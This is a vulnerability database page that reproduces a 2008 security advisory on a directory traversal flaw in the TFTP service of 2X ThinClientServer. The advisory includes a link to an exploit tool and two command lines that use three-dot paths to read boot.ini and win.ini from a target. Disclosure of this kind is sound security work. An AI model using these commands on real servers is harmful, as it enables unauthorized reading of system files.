Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

2xthinclient-traverse.txt

🗓️ 01 Apr 2008 00:00:00Reported by Luigi AuriemmaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

2X ThinClientServer directory traversal vulnerability, version <= v5.0_sp1-r3497, Window

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
#######################################################################  
  
Luigi Auriemma  
  
Application: 2X ThinClientServer  
http://www.2x.com/thinclientserver/  
Versions: <= v5.0_sp1-r3497  
(TFTPd.exe <= 3.2.0.0)  
Platforms: Windows  
Bug: directory traversal  
Exploitation: remote  
Date: 29 Mar 2008  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
>From the manual:  
"2X ThinClientServer allows you to deploy a thin client OS to low-cost  
thin client devices and existing PCs, and centrally manage settings and  
configure to which terminal servers (Windows or Linux) a user should  
log on to."  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
The 2X TFTP Service enabled by default in ThinClientServer is affected  
by a directory traversal vulnerability exploitable through the usage of  
a sequence of 3 dots (instead of the classical two) for reaching the  
various parent directories.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://aluigi.org/testz/tftpx.zip  
  
tftpx SERVER .../.../.../.../.../.../boot.ini none  
tftpx SERVER ...\...\...\...\...\...\windows\win.ini none  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.org  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
2x thinclientserverdirectory traversalvulnerabilityversionv5.0_sp1-r3497windowsremote
19
.json
Report